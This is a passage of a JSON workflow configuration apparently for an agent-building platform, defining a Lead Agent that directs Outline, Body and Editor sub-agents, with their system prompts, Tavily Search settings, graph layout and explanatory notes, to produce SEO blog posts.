"sys_prompt": "# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature": "0.1",
"temperatureEnabled": true,
"tools": [
{
"component_name": "Agent",
"id": "Agent:SlickSpidersTurn",
"name": "Outline Agent",
"params": {
"delay_after_error": 1,
"description": "Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.3,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 2,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Balance",
"presencePenaltyEnabled": false,
"presence_penalty": 0.2,
"prompts": [
{
"content": "{sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature": 0.5,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.85,
"user_prompt": "This is the order you need to send to the agent.",
"visual_files_var": ""
}
},
{
"component_name": "Agent",
"id": "Agent:IcyPawsRescue",
"name": "Body Agent",
"params": {
"delay_after_error": 1,
"description": "Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "{sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "This is the order you need to send to the agent.",
"visual_files_var": ""
}
},
{
"component_name": "Agent",
"id": "Agent:TenderAdsAllow",
"name": "Editor Agent",
"params": {
"delay_after_error": 1,
"description": "Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 2,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "{sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "This is the order you need to send to the agent.",
"visual_files_var": ""
}
}
],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
}
},
"upstream": [
"begin"
]
},
"Message:ModernSwansThrow": {
"downstream": [],
"obj": {
"component_name": "Message",
"params": {
"content": [
"{Agent:LuckyApplesGrab@content}"
]
}
},
"upstream": [
"Agent:LuckyApplesGrab"
]
},
"begin": {
"downstream": [
"Agent:LuckyApplesGrab"
],
"obj": {
"component_name": "Begin",
"params": {
"enablePrologue": true,
"inputs": {},
"mode": "conversational",
"prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
}
},
"upstream": []
}
},
"globals": {
"sys.conversation_turns": 0,
"sys.files": [],
"sys.query": "",
"sys.user_id": ""
},
"graph": {
"edges": [
{
"data": {
"isHovered": false
},
"id": "xy-edge__beginstart-Agent:LuckyApplesGrabend",
"source": "begin",
"sourceHandle": "start",
"target": "Agent:LuckyApplesGrab",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:LuckyApplesGrabstart-Message:ModernSwansThrowend",
"source": "Agent:LuckyApplesGrab",
"sourceHandle": "start",
"target": "Message:ModernSwansThrow",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:LuckyApplesGrabagentBottom-Agent:SlickSpidersTurnagentTop",
"source": "Agent:LuckyApplesGrab",
"sourceHandle": "agentBottom",
"target": "Agent:SlickSpidersTurn",
"targetHandle": "agentTop"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:LuckyApplesGrabagentBottom-Agent:IcyPawsRescueagentTop",
"source": "Agent:LuckyApplesGrab",
"sourceHandle": "agentBottom",
"target": "Agent:IcyPawsRescue",
"targetHandle": "agentTop"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:LuckyApplesGrabagentBottom-Agent:TenderAdsAllowagentTop",
"source": "Agent:LuckyApplesGrab",
"sourceHandle": "agentBottom",
"target": "Agent:TenderAdsAllow",
"targetHandle": "agentTop"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:SlickSpidersTurntool-Tool:ThreeWallsRingend",
"source": "Agent:SlickSpidersTurn",
"sourceHandle": "tool",
"target": "Tool:ThreeWallsRing",
"targetHandle": "end"
},
{
"data": {
"isHovered": false
},
"id": "xy-edge__Agent:IcyPawsRescuetool-Tool:FloppyJokesItchend",
"source": "Agent:IcyPawsRescue",
"sourceHandle": "tool",
"target": "Tool:FloppyJokesItch",
"targetHandle": "end"
}
],
"nodes": [
{
"data": {
"form": {
"enablePrologue": true,
"inputs": {},
"mode": "conversational",
"prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label": "Begin",
"name": "begin"
},
"dragging": false,
"id": "begin",
"measured": {
"height": 48,
"width": 200
},
"position": {
"x": 38.19445084117184,
"y": 183.9781832844475
},
"selected": false,
"sourcePosition": "left",
"targetPosition": "right",
"type": "beginNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The user query is {sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature": "0.1",
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
},
"label": "Agent",
"name": "Lead Agent"
},
"id": "Agent:LuckyApplesGrab",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 350,
"y": 200
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"content": [
"{Agent:LuckyApplesGrab@content}"
]
},
"label": "Message",
"name": "Response"
},
"dragging": false,
"id": "Message:ModernSwansThrow",
"measured": {
"height": 56,
"width": 200
},
"position": {
"x": 669.394830760932,
"y": 190.72421137520644
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "messageNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.3,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 2,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Balance",
"presencePenaltyEnabled": false,
"presence_penalty": 0.2,
"prompts": [
{
"content": "{sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature": 0.5,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.85,
"user_prompt": "This is the order you need to send to the agent.",
"visual_files_var": ""
},
"label": "Agent",
"name": "Outline Agent"
},
"dragging": false,
"id": "Agent:SlickSpidersTurn",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 100.60137004146719,
"y": 411.67654846431367
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "{sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "This is the order you need to send to the agent.",
"visual_files_var": ""
},
"label": "Agent",
"name": "Body Agent"
},
"dragging": false,
"id": "Agent:IcyPawsRescue",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 439.3374395738501,
"y": 366.1408588516909
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 2,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "{sys.query}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "This is the order you need to send to the agent.",
"visual_files_var": ""
},
"label": "Agent",
"name": "Editor Agent"
},
"dragging": false,
"id": "Agent:TenderAdsAllow",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 730.8513124709204,
"y": 327.351197329827
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"description": "This is an agent for a specific task.",
"user_prompt": "This is the order you need to send to the agent."
},
"label": "Tool",
"name": "flow.tool_0"
},
"dragging": false,
"id": "Tool:ThreeWallsRing",
"measured": {
"height": 48,
"width": 200
},
"position": {
"x": -26.93431957115564,
"y": 531.4384641920368
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "toolNode"
},
{
"data": {
"form": {
"description": "This is an agent for a specific task.",
"user_prompt": "This is the order you need to send to the agent."
},
"label": "Tool",
"name": "flow.tool_1"
},
"dragging": false,
"id": "Tool:FloppyJokesItch",
"measured": {
"height": 48,
"width": 200
},
"position": {
"x": 414.6786783453011,
"y": 499.39483076093194
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "toolNode"
},
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"text": "This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI \u201cwriters\u201d, where each agent plays a specialized role \u2014 just like a real editorial team.\n\nInstead of one AI doing everything in order, this version uses a **Lead Agent** to assign tasks to different sub-agents, who then write and edit the blog in parallel. The Lead Agent manages everything and produces the final output.\n\n### Why use multi-agent format?\n\n- Better control over each stage of writing \n- Easier to reuse agents across tasks \n- More human-like workflow (planning \u2192 writing \u2192 editing \u2192 publishing) \n- Easier to scale and customize for advanced users\n\n### Flow Summary:\n\n1. `LeadWriter_Agent` takes your input and creates a plan\n2. It sends that plan to:\n - `OutlineWriter_Agent`: build blog structure\n - `BodyWriter_Agent`: write full content\n - `FinalEditor_Agent`: polish and finalize\n3. `LeadWriter_Agent` collects all results and outputs the final blog post\n"
},
"label": "Note",
"name": "Workflow Overall Description"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 208,
"id": "Note:ElevenVansInvent",
"measured": {
"height": 208,
"width": 518
},
"position": {
"x": -336.6586460874556,
"y": 113.43253511344867
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 518
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis is the central agent that controls the entire writing process.\n\n**What it does**:\n- Reads your blog topic and intent\n- Generates a clear writing plan (topic, audience, goal, keywords)\n- Sends instructions to all sub-agents\n- Waits for their responses and checks quality\n- If any section is missing or weak, it can request a rewrite\n- Finally, it assembles all parts into a complete blog and sends it back to you\n"
},
"label": "Note",
"name": "Lead Agent"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 146,
"id": "Note:EmptyClubsGreet",
"measured": {
"height": 146,
"width": 334
},
"position": {
"x": 390.1408623279084,
"y": 2.6521144030202493
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 334
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent is responsible for building the blog's structure. It creates an outline that shows what the article will cover and how it's organized.\n\n**What it does**:\n- Suggests a blog title that matches the topic and keywords \n- Breaks the article into sections using H2 and H3 headers \n- Adds a short description of what each section should include \n- Assigns SEO keywords to each section for better search visibility \n- Uses search data (via Tavily Search) to find how similar blogs are structured"
},
"label": "Note",
"name": "Outline Agent"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 157,
"id": "Note:CurlyTigersDouble",
"measured": {
"height": 157,
"width": 394
},
"position": {
"x": -60.03139680691618,
"y": 595.8208080534818
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 394
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent is in charge of writing the full blog content, section by section, based on the outline it receives.\n\n**What it does**:\n- Takes each section heading from the outline (H2 / H3)\n- Writes a complete paragraph (150\u2013220 words) under each section\n- Naturally includes the keywords provided for that section\n- Uses the Tavily Search tool to add real-world examples, definitions, or facts if needed\n- Makes sure each section is clear, useful, and easy to read\n"
},
"label": "Note",
"name": "Body Agent"
},
"dragHandle": ".note-drag-handle",
